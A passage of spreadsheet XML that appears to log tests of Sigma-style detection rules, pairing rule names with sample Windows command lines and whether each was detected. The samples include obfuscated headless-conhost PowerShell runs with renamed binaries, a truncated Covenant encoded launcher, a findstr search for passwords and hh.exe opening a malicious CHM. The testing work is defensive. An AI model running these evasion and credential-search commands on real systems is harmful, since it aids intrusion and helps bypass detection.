      <c r="J2054" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2054" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2055" ht="15.75" customHeight="1" s="42">
      <c r="A2055" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2055" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2055" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2055" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2055" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -comManD Get-Process</t>
        </is>
      </c>
      <c r="F2055" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2055" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2055" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2055" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2055" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2055" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2056" ht="15.75" customHeight="1" s="42">
      <c r="A2056" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2056" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2056" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2056" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2056" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmMaND Get-Process</t>
        </is>
      </c>
      <c r="F2056" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2056" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2056" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2056" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2056" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2056" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2057" ht="15.75" customHeight="1" s="42">
      <c r="A2057" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2057" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2057" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2057" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2057" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -"Command" Get-Process</t>
        </is>
      </c>
      <c r="F2057" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2057" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2057" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2057" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2057" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2057" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2058" ht="15.75" customHeight="1" s="42">
      <c r="A2058" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2058" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2058" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2058" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2058" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2058" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2058" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2058" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2058" s="43" t="n"/>
      <c r="J2058" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2058" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2059" ht="15.75" customHeight="1" s="42">
      <c r="A2059" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2059" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2059" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2059" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2059" s="43" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmMANd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2059" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2059" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2059" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2059" s="43" t="n"/>
      <c r="J2059" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2059" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2060" ht="15.75" customHeight="1" s="42">
      <c r="A2060" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2060" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2060" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2060" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2060" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdleSS pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2060" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2060" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2060" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2060" s="43" t="n"/>
      <c r="J2060" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2060" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2061" ht="15.75" customHeight="1" s="42">
      <c r="A2061" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2061" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2061" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2061" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2061" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdLEss pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2061" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2061" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2061" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2061" s="43" t="n"/>
      <c r="J2061" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2061" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2062" ht="15.75" customHeight="1" s="42">
      <c r="A2062" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2062" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2062" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2062" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2062" s="43" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2062" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2062" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2062" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2062" s="43" t="n"/>
      <c r="J2062" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2062" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2063" ht="15.75" customHeight="1" s="42">
      <c r="A2063" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2063" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2063" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2063" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2063" s="43" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2063" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2063" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2063" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2063" s="43" t="n"/>
      <c r="J2063" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2063" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2064" ht="15.75" customHeight="1" s="42">
      <c r="A2064" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2064" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2064" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2064" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2064" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2064" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2064" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2064" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2064" s="43" t="n"/>
      <c r="J2064" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2064" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2065" ht="15.75" customHeight="1" s="42">
      <c r="A2065" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2065" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2065" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2065" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2065" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlESs pwsh.exe -cOmMand "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2065" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2065" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2065" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2065" s="43" t="n"/>
      <c r="J2065" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2065" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2066" ht="15.75" customHeight="1" s="42">
      <c r="A2066" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2066" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2066" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2066" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2066" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2066" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2066" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2066" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2066" s="43" t="n"/>
      <c r="J2066" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2066" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2067" ht="15.75" customHeight="1" s="42">
      <c r="A2067" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2067" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2067" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2067" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2067" s="43" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmmAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2067" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2067" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2067" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2067" s="43" t="n"/>
      <c r="J2067" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2067" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2068" ht="15.75" customHeight="1" s="42">
      <c r="A2068" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2068" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2068" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2068" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2068" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --headless C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2068" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2068" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2068" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2068" s="43" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Rename Of Highly Relevant Binaries (0ba1da6d-b6ce-4366-828c-18826c9de23e); Uncommon Child Process Of Conhost.EXE (7dc2dedd-7603-461a-bc13-15803d132355); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2068" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2068" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2069" ht="15.75" customHeight="1" s="42">
      <c r="A2069" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2069" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2069" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2069" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2069" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe -"-headless" C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2069" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2069" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2069" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2069" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2069" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2069" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2070" ht="15.75" customHeight="1" s="42">
      <c r="A2070" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2070" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2070" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2070" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2070" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEADlEsS C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2070" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2070" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2070" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2070" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2070" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2070" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2071" ht="15.75" customHeight="1" s="42">
      <c r="A2071" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2071" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2071" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2071" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2071" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe /"-headless" C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2071" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2071" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2071" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2071" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2071" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2071" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2072" ht="15.75" customHeight="1" s="42">
      <c r="A2072" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2072" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2072" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2072" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2072" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --HeADLeSS C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2072" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2072" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2072" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2072" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2072" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2072" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2073" ht="15.75" customHeight="1" s="42">
      <c r="A2073" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2073" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2073" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2073" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2073" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEAdlESS C:\Temp\sys.exe -CommAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2073" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2073" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2073" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2073" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2073" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2073" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2074" ht="15.75" customHeight="1" s="42">
      <c r="A2074" s="43" t="n"/>
      <c r="B2074" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C2074" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D2074" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E2074" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -e cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F2074" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2074" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2074" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2074" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2074" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2074" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2075" ht="15.75" customHeight="1" s="42">
      <c r="A2075" s="43" t="n"/>
      <c r="B2075" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C2075" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D2075" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E2075" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -E cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F2075" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2075" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2075" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2075" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2075" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2075" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2076" ht="15.75" customHeight="1" s="42">
      <c r="A2076" s="43" t="n"/>
      <c r="B2076" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2076" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2076" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2076" s="43" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2076" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2076" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2076" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2076" s="43" t="n"/>
      <c r="J2076" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K2076" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2077" ht="15.75" customHeight="1" s="42">
      <c r="A2077" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2077" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2077" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2077" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2077" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F2077" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2077" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2077" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2077" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2077" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2077" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2078" ht="15.75" customHeight="1" s="42">
      <c r="A2078" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2078" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2078" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2078" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2078" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F2078" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2078" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2078" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2078" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2078" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2078" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2079" ht="15.75" customHeight="1" s="42">
      <c r="A2079" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2079" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2079" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2079" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2079" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F2079" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2079" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2079" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2079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079" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2079" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2080" ht="15.75" customHeight="1" s="42">
      <c r="A2080" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
